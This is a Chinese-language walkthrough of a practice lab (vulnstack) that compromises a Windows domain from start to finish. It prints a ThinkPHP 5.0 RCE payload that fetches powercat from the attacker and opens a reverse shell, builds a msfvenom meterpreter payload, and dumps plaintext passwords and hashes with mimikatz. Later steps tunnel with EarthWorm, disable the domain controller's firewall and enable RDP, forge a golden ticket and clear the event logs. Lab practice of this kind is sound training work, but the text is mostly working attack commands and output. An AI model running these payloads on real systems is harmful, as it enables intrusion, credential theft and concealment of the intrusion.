靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
环境部署: Win7 Win7做Web服务器,有两条网卡,分别连通内外网:
1 2 3 内网IP:192.168.138.136 外网IP:192.168.135.150 注意手动打开phpstudy
Windows 2008 Windows 2008只有一个网卡连接,处于内网无法与外网通信:
攻击机: VMnet2网卡设置如下:
外网渗透:
进入网页后,可以发现部署的是5.0版本的ThinkPHP,去网上搜一搜能发现不少payload:
1 ?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
利用网上的payload打一下:
RCE成功。接下来利用powercat反弹一下shell:
1 ?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://192.168.135.128:1235/powercat.ps1');powercat -c 192.168.135.128 -p 1234 -e cmd.exe
反弹成功。
接下来利用metasploit制作一个exe,在靶机中下载下来然后执行,把meterpreter反弹出来:
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.135.128 LPORT=1236 -f exe -o shell.exe
接下来msf监听,在拿到的shell中执行下载的木马文件,拿到meterpreter:
内网信息收集: 在meterpreter执行getsystem即可拿到system权限。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 net view # 查看局域网内其他主机名 net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net user # 查看本机用户列表 net user /domain # 查看域用户 net localgroup administrators # 查看本地管理员组(通常会有域用户) net view /domain # 查看有几个域 net user 用户名 /domain # 获取指定域用户的信息 net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作) net time /domain #判断主域,主域服务器一般做时间服务器 net group 组名 /domain # 查看域中某工作组 net group "domain admins" /domain # 查看域管理员的名字 net group "domain computers" /domain # 查看域中的其他主机名 net group "domain controllers" /domain # 查看域控制器主机名(可能有多台) ipconfig /all #查询本机IP段,所在域等
执行ipconfig /all可以发现Web服务器的内网IP为192.168.138.136,并且DNS server为192.168.138.138:
IP为192.168.138.138的这台机器应该就是DC了。根据ipconfig /all返回的内容也可以得知当前所在域为sun.com。可以判断出我们最开始拿到的shell的用户就是域管:
域中的用户如下:
内网主机如下所示:
查看有多少域:
由于msf的mimikatz一直不好用,我们自己上传一个,然后拿一下密码:
拿一下系统密码:
1 2 3 mimikatz.exe privilege::debug#权限提升 sekurlsa::logonPasswords#明文抓取
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 mimikatz # sekurlsa::logonPasswords Authentication Id : 0 ; 1372017 (00000000:0014ef71) Session : CachedInteractive from 1 User Name : Administrator Domain : SUN Logon Server : DC Logon Time : 2022/11/8 13:10:01 SID : S-1-5-21-3388020223-1982701712-4030140183-500 msv : [00000003] Primary * Username : Administrator * Domain : SUN * LM : c8c42d085b5e3da2e9260223765451f1 * NTLM : e8bea972b3549868cecd667a64a6ac46 * SHA1 : 3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee tspkg : * Username : Administrator * Domain : SUN * Password : dc123.com wdigest : * Username : Administrator * Domain : SUN * Password : dc123.com kerberos : * Username : Administrator * Domain : SUN.COM * Password : dc123.com ssp : credman : Authentication Id : 0 ; 578158 (00000000:0008d26e) Session : Interactive from 1 User Name : leo Domain : SUN Logon Server : DC Logon Time : 2022/11/8 13:06:13 SID : S-1-5-21-3388020223-1982701712-4030140183-1110 msv : [00000003] Primary * Username : leo * Domain : SUN * LM : b73a13e9b7832a35aad3b435b51404ee * NTLM : afffeba176210fad4628f0524bfe1942 * SHA1 : fa83a92197d9896cb41463b7a917528b4009c650 tspkg : * Username : leo * Domain : SUN * Password : 123.com wdigest : * Username : leo * Domain : SUN * Password : 123.com kerberos : * Username : leo * Domain : SUN.COM * Password : 123.com ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2022/11/8 13:06:01 SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : WIN7$ Domain : SUN Logon Server : (null) Logon Time : 2022/11/8 13:06:01 SID : S-1-5-20 msv : [00000003] Primary * Username : WIN7$ * Domain : SUN * NTLM : dc1cbe1583c92a3740cfcd97e8f0a377 * SHA1 : 9275a3ad29e3f533b9a46b981dd635b6adc76169 tspkg : wdigest : * Username : WIN7$ * Domain : SUN * Password : 5a 45 e6 d5 ca ea f3 f2 12 6e 93 4b b8 36 8b 96 02 92 92 af 89 53 f2 61 a4 cf df fb b1 fe d4 3e 15 4a 50 c1 1d 49 82 ad d2 b9 09 de bb c2 0a 73 93 73 63 92 e2 5e 43 df 49 db fa 4f 34 d4 cc 3d a7 4d eb 2e 9a 06 b7 b1 c8 f6 dd f2 62 46 b2 bd 40 a4 ca 49 90 1b 46 79 05 d2 9e 0b 22 35 03 84 c4 d9 02 8b 6a fc 28 21 5c 59 46 59 e7 4c ae 9f 67 ea 59 bd 16 f3 f8 d6 42 7f e8 41 66 92 08 39 d8 58 18 0f dc eb 7a 18 1b 9d ca 6b a1 97 05 b5 55 c1 40 82 3e 64 5a cc 1a 78 9a bc 7f 27 c8 f0 47 7f 9f bd f1 53 4b ab c7 2a e1 cc fa bc 51 62 e1 17 7a 74 32 39 cd 5b 99 c8 40 5c 84 93 b3 cb 7c 0e 0e 29 02 9c 46 ab f2 73 c2 4e 64 c3 58 b4 22 21 77 c1 71 e6 b8 aa b8 45 ae e6 a5 63 a4 9a 45 03 ab 3a 3d c1 36 a1 84 3c db a6 d3 ac 16 65 kerberos : * Username : win7$ * Domain : SUN.COM * Password : 5a 45 e6 d5 ca ea f3 f2 12 6e 93 4b b8 36 8b 96 02 92 92 af 89 53 f2 61 a4 cf df fb b1 fe d4 3e 15 4a 50 c1 1d 49 82 ad d2 b9 09 de bb c2 0a 73 93 73 63 92 e2 5e 43 df 49 db fa 4f 34 d4 cc 3d a7 4d eb 2e 9a 06 b7 b1 c8 f6 dd f2 62 46 b2 bd 40 a4 ca 49 90 1b 46 79 05 d2 9e 0b 22 35 03 84 c4 d9 02 8b 6a fc 28 21 5c 59 46 59 e7 4c ae 9f 67 ea 59 bd 16 f3 f8 d6 42 7f e8 41 66 92 08 39 d8 58 18 0f dc eb 7a 18 1b 9d ca 6b a1 97 05 b5 55 c1 40 82 3e 64 5a cc 1a 78 9a bc 7f 27 c8 f0 47 7f 9f bd f1 53 4b ab c7 2a e1 cc fa bc 51 62 e1 17 7a 74 32 39 cd 5b 99 c8 40 5c 84 93 b3 cb 7c 0e 0e 29 02 9c 46 ab f2 73 c2 4e 64 c3 58 b4 22 21 77 c1 71 e6 b8 aa b8 45 ae e6 a5 63 a4 9a 45 03 ab 3a 3d c1 36 a1 84 3c db a6 d3 ac 16 65 ssp : credman : Authentication Id : 0 ; 50586 (00000000:0000c59a) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 2022/11/8 13:06:01 SID : msv : [00000003] Primary * Username : WIN7$ * Domain : SUN * NTLM : dc1cbe1583c92a3740cfcd97e8f0a377 * SHA1 : 9275a3ad29e3f533b9a46b981dd635b6adc76169 tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : WIN7$ Domain : SUN Logon Server : (null) Logon Time : 2022/11/8 13:06:01 SID : S-1-5-18 msv : tspkg : wdigest : * Username : WIN7$ * Domain : SUN * Password : 5a 45 e6 d5 ca ea f3 f2 12 6e 93 4b b8 36 8b 96 02 92 92 af 89 53 f2 61 a4 cf df fb b1 fe d4 3e 15 4a 50 c1 1d 49 82 ad d2 b9 09 de bb c2 0a 73 93 73 63 92 e2 5e 43 df 49 db fa 4f 34 d4 cc 3d a7 4d eb 2e 9a 06 b7 b1 c8 f6 dd f2 62 46 b2 bd 40 a4 ca 49 90 1b 46 79 05 d2 9e 0b 22 35 03 84 c4 d9 02 8b 6a fc 28 21 5c 59 46 59 e7 4c ae 9f 67 ea 59 bd 16 f3 f8 d6 42 7f e8 41 66 92 08 39 d8 58 18 0f dc eb 7a 18 1b 9d ca 6b a1 97 05 b5 55 c1 40 82 3e 64 5a cc 1a 78 9a bc 7f 27 c8 f0 47 7f 9f bd f1 53 4b ab c7 2a e1 cc fa bc 51 62 e1 17 7a 74 32 39 cd 5b 99 c8 40 5c 84 93 b3 cb 7c 0e 0e 29 02 9c 46 ab f2 73 c2 4e 64 c3 58 b4 22 21 77 c1 71 e6 b8 aa b8 45 ae e6 a5 63 a4 9a 45 03 ab 3a 3d c1 36 a1 84 3c db a6 d3 ac 16 65 kerberos : * Username : win7$ * Domain : SUN.COM * Password : 5a 45 e6 d5 ca ea f3 f2 12 6e 93 4b b8 36 8b 96 02 92 92 af 89 53 f2 61 a4 cf df fb b1 fe d4 3e 15 4a 50 c1 1d 49 82 ad d2 b9 09 de bb c2 0a 73 93 73 63 92 e2 5e 43 df 49 db fa 4f 34 d4 cc 3d a7 4d eb 2e 9a 06 b7 b1 c8 f6 dd f2 62 46 b2 bd 40 a4 ca 49 90 1b 46 79 05 d2 9e 0b 22 35 03 84 c4 d9 02 8b 6a fc 28 21 5c 59 46 59 e7 4c ae 9f 67 ea 59 bd 16 f3 f8 d6 42 7f e8 41 66 92 08 39 d8 58 18 0f dc eb 7a 18 1b 9d ca 6b a1 97 05 b5 55 c1 40 82 3e 64 5a cc 1a 78 9a bc 7f 27 c8 f0 47 7f 9f bd f1 53 4b ab c7 2a e1 cc fa bc 51 62 e1 17 7a 74 32 39 cd 5b 99 c8 40 5c 84 93 b3 cb 7c 0e 0e 29 02 9c 46 ab f2 73 c2 4e 64 c3 58 b4 22 21 77 c1 71 e6 b8 aa b8 45 ae e6 a5 63 a4 9a 45 03 ab 3a 3d c1 36 a1 84 3c db a6 d3 ac 16 65 ssp : credman :
域管的账号及密码:
域用户leo的账号及密码:
路由转发及隐藏通信隧道
接下来尝试利用EarthWarm来搭建一个隐藏通信隧道,首先为Win7上传一个ew_for_Win.exe,接下来就可以搭建了:
1 2 ./ew_for_linux64 -s rcsocks -l 1238 -e 1237(攻击机执行) ew_for_Win.exe -s rssocks -d 192.168.135.128 -e 1237(靶机执行)
成功搭建:
我们修改proxychains4.conf添加如下代理:
同时不要忘记注释掉proxy_dns。
接下来利用proxychains4来通过添加的代理利用nmap扫描一下192.168.138.138这台机子:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 proxychains4 nmap -sS -sV -sC -A -p- --min-rate 5000 192.168.138.138 Nmap scan report for 192.168.138.138 Host is up (0.0024s latency). Not shown: 65516 filtered ports PORT STATE SERVICE VERSION 25/tcp open tcpwrapped |_smtp-commands: Couldn't establish connection on port 25 53/tcp open domain Microsoft DNS 6.1.7600 (1DB04001) (Windows Server 2008 R2) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7600 (1DB04001) 110/tcp open tcpwrapped 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sun.com, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2008 HPC Edition 7600 microsoft-ds (workgroup: SUN) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sun.com, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49160/tcp open msrpc Microsoft Windows RPC 49168/tcp open msrpc Microsoft Windows RPC 49173/tcp open msrpc Microsoft Windows RPC 49226/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Microsoft Windows XP|7|2012 OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012 OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2, cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -2h39m55s, deviation: 4h36m58s, median: -1s |_nbstat: NetBIOS name: DC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:92:68:89 (VMware) | smb-os-discovery: | OS: Windows Server 2008 HPC Edition 7600 (Windows Server 2008 HPC Edition 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008::- | Computer name: DC | NetBIOS computer name: DC\x00 | Domain name: sun.com | Forest name: sun.com | FQDN: DC.sun.com |_ System time: 2022-11-08T01:37:00+08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2022-11-07T17:37:00 |_ start_date: 2022-11-07T16:39:34 TRACEROUTE (using port 25/tcp) HOP RTT ADDRESS 1 3.57 ms 192.168.135.2 2 3.58 ms 192.168.138.138 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 277.66 seconds
开启了445端口,尝试利用ms17_010未果,但因为已经拿到了域管的账号和密码,所以尝试利用psexec进行无IPC登陆域控。
psexec登陆域控 1 2 3 4 5 6 7 use exploit/windows/smb/psexec set rhosts 192.168.138.138 set SMBDomain SUN set SMBUser Administrator set SMBPass dc123.com set payload windows/meterpreter/bind_tcp #因为已经配置好了路由,且域控不出网 set lport 1239
没有登陆成功,猜测是开启了防火墙,尝试关闭防火墙:
首先开启Win7与Windows2008之间的IPC连接:
1 net use \\192.168.138.138\ipc$ "dc123.com" /user:"Administrator"
接着用sc通过创建服务来远程执行:
1 2 sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \\192.168.138.138 start unablefirewall
此时再次启动利用psexec登陆域控:
成功登陆。刚刚利用nmap扫域控的时候没有发现开启3389端口,进去输入netstat -ano看看情况:
并未发现3389端口开启。先看看有没有开启RDP:
1 2 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启
可以发现RDP是关闭的。那么我们给它打开:
1 REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
因为我们刚刚已经关闭了防火墙,所以在此处我们不需要添加防火墙规则允许3389端口了。再查看一下端口情况:
接下来再利用隧道登陆到域控的远程桌面上:
成功登陆:
权限维持 黄金票据 首先拿到krbtgt的ntlm hash值和域SID值:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 mimikatz # lsadump::lsa /patch Domain : SUN / S-1-5-21-3388020223-1982701712-4030140183 RID : 000001f4 (500) User : Administrator LM : NTLM : 8c535a2d84c3b21059d667639bb89db5 RID : 000001f5 (501) User : Guest LM : NTLM : RID : 000001f6 (502) User : krbtgt LM : NTLM : 65dc23a67f31503698981f2665f9d858 RID : 000003e8 (1000) User : admin LM : NTLM : 8c535a2d84c3b21059d667639bb89db5 RID : 00000456 (1110) User : leo LM : NTLM : afffeba176210fad4628f0524bfe1942 RID : 000003e9 (1001) User : DC$ LM : NTLM : 7178f86541258a83bf19728f010c64da RID : 00000451 (1105) User : WIN7$ LM : NTLM : dc1cbe1583c92a3740cfcd97e8f0a377
再Win7上先清除票据缓存:
生成黄金票据并注入内存:
执行klist查看票据:
痕迹清理 查看事件日志:
清除事件日志(包括六种日志类型)
